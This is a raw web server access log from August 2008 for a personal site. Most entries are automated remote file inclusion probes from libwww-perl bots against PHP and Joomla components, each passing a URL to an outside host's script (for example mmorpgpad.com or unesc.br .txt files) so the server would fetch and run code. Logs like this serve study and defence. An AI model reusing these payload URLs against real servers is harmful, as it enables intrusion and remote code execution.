72.199.235.196 - - [12/Aug/2008:09:51:41 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:52:21 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:52:22 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:52:22 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
164.156.30.52 - - [12/Aug/2008:09:52:31 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/index.php?showtopic=36984&hl=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:52:41 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:52:53 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:52:53 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:52:54 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:53:21 -0700] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:53:21 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 500 292 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:53:21 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:53:25 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:53:30 -0700] "GET /logs/access_080221.log%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:53:30 -0700] "GET /logs/access_080127.log%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:53:33 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:53:35 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:53:36 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:53:38 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:53:39 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:53:41 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:53:41 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:53:53 -0700] "GET /logs/access_080306.log%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:53:53 -0700] "GET /logs/access_080104.log%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:53:57 -0700] "GET /logs/access_080404.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:53:58 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 200 18521 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:53:58 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:54:12 -0700] "GET /logs/access_080404.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:54:14 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 200 18527 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:54:14 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:54:20 -0700] "GET /logs/access_080214.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:54:30 -0700] "GET /logs/access_080214.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:54:33 -0700] "GET /logs/access_080214.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:54:42 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
202.70.83.4 - - [12/Aug/2008:09:55:19 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://ugtcajamadrid.org/ips.tx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.70.83.4 - - [12/Aug/2008:09:55:20 -0700] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://ugtcajamadrid.org/ips.tx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:55:28 -0700] "GET /logs/access_080404.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:55:29 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:55:30 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 200 18549 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:55:30 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:55:31 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 200 18533 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:55:31 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.48.41.130 - - [12/Aug/2008:09:55:32 -0700] "GET /logs/access_080306.log/errors.php?error=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:55:38 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:55:40 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:55:42 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:55:42 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:55:42 -0700] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:55:42 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:55:42 -0700] "GET /logs/access_080404.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
58.69.184.173 - - [12/Aug/2008:09:55:42 -0700] "GET /logs/access_080329.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:55:53 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:55:55 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
58.69.184.173 - - [12/Aug/2008:09:55:57 -0700] "GET /logs/access_080305.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.236.143.248 - - [12/Aug/2008:09:55:57 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.freewebs.com/dopeslave/ID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.236.143.248 - - [12/Aug/2008:09:55:58 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.freewebs.com/dopeslave/ID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.236.143.248 - - [12/Aug/2008:09:55:58 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.freewebs.com/dopeslave/ID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:56:08 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:56:08 -0700] "GET /logs/access_080125.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:56:09 -0700] "GET /logs/access_080131.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:56:11 -0700] "GET /logs/access_080126.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.236.143.248 - - [12/Aug/2008:09:56:14 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.freewebs.com/dopeslave/ID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:09:56:21 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:09:56:22 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:09:56:22 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:56:32 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:56:42 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
75.127.70.4 - - [12/Aug/2008:09:56:48 -0700] "GET //BaseAdmin.class.php?_CONF[path]=http://www.bdf-diff.net/img/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
75.127.70.4 - - [12/Aug/2008:09:56:48 -0700] "GET /logs//BaseAdmin.class.php?_CONF[path]=http://www.bdf-diff.net/img/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:56:50 -0700] "GET /logs/access_080214.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:56:50 -0700] "GET /logs/access_080321.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:56:50 -0700] "GET /logs/access_080110.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:56:50 -0700] "GET /logs/access_080119.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:56:51 -0700] "GET /logs/access_080221.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.208.194 - - [12/Aug/2008:09:56:52 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.folkswandertage.de/2007/mail/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.85.208.194 - - [12/Aug/2008:09:56:53 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.folkswandertage.de/2007/mail/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.85.208.194 - - [12/Aug/2008:09:56:53 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.folkswandertage.de/2007/mail/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.85.208.194 - - [12/Aug/2008:09:56:53 -0700] "GET /logs/access_071119.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.folkswandertage.de/2007/mail/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:09:57:00 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:09:57:00 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:09:57:01 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.119.28.109 - - [12/Aug/2008:09:57:08 -0700] "GET /logs/access_080121.log//index2.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://www.samnus.com.mx/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:57:15 -0700] "GET /logs/access_080229.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:57:38 -0700] "GET /logs/access_080311.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:57:43 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:57:49 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:57:51 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.151.211 - - [12/Aug/2008:09:57:54 -0700] "GET /logs/access_080218.log//index.php?pagina=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.151.211 - - [12/Aug/2008:09:57:54 -0700] "GET /logs//index.php?pagina=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.151.211 - - [12/Aug/2008:09:57:55 -0700] "GET //index.php?pagina=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 200 18415 "-" "libwww-perl/5.810" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:58:00 -0700] "GET /logs/access_080207.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:58:00 -0700] "GET /logs/access_080118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:58:01 -0700] "GET /logs/access_080124.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:09:58:03 -0700] "GET /logs/access_080104.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:58:08 -0700] "GET /logs/access_080229.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:58:19 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:58:20 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [12/Aug/2008:09:58:23 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://lipuu.com/tool/chid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [12/Aug/2008:09:58:24 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://lipuu.com/tool/chid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [12/Aug/2008:09:58:24 -0700] "GET /logs/access_080209.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://lipuu.com/tool/chid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [12/Aug/2008:09:58:24 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://lipuu.com/tool/chid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:58:42 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
85.17.103.109 - - [12/Aug/2008:09:58:43 -0700] "GET /logs//index.php?pagina=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.103.109 - - [12/Aug/2008:09:58:43 -0700] "GET /logs/access_080218.log//index.php?pagina=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.103.109 - - [12/Aug/2008:09:58:44 -0700] "GET //index.php?pagina=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 200 18415 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:58:46 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:58:47 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
